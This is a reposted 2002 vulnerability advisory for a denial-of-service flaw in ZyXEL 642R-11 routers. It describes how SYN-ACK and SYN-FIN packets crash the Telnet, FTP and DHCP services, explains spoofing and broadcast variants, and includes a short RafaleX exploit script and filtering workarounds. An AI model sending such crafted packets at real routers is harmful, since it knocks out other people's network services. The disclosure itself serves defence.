Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

by Nikola Strahija on June 17th, 2002 ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets. It is possible to send a packet that will make unavailable the router's services (Telnet&FTP, DHCP service not tested). Network traffic isn't stopped. Possibly more ZyNOS based routers are vulnerable. Please reply if you found any other ZyNOS based router vulnerable.


Details
- - -------
A ZyXEL 642R-11 router service can be crashed by sending a packet
with TCP flags ACK and SYN set at the same time.
The service will not be available even through RS-232.
Using a SYN-FIN packet will make inaccessible the service port for a
few minutes.

Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
enabled). TELNET and FTP cannot be deactivated.

Bypass packet filter rules:
The IP source can be a spoofed one also. This will allow to "bypass"
a filter that blocks specifc IP's.
As target address you can also use the WAN address in LAN (see
BID3346: http://online.securityfocus.com/bid/3346), if the router's
packet filter
blocks his local address as target.
The DoS attack works also using the broadcast address of the LAN.
This means that all ZyXEL routers in LAN vulnerable
to this attack can be crashed by sending one single packet.

Exploit
- - -------

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed
(V2.50(AJ.6))

!Sleep 1000

!Display=$done

Fix
- - ---
not yet available (17.6.2002). Vendor was contacted 1.6.2002.

Workaround
- - ----------
- - - on WAN device block these packets:
- all packets coming from WAN to port 21,23 and 67
(source: 0.0.0.0 -> target: 0.0.0.0, apply on input filter of WAN
device)
- - - on LAN device block these packets, ports 21,23 and 67
- WAN IP of the router as target IP (Why?
http://online.securityfocus.com/bid/3346..)
- LAN address of the router as target IP
- Broadcast address as target IP.. ;)

Regards,
Ueli Kistler
[email protected] / [email protected]
www.packx.net / www.eclipse.fr.fm (IDScenter 1.09 beta 2 is soon
out)

Greets to PacKX Team (RafaleX packet builder for Win2K/XP)

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBPQ3dBmnfm6NyZfRJEQKxCACfZhLa34IfHY7NL5bSl9NK11nUI+EAoNLF
ZS3YZqNynsew/jYuvcnLhUVT
=hDk8
-----END PGP SIGNATURE-----

Key-ID: 0x7265F449


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »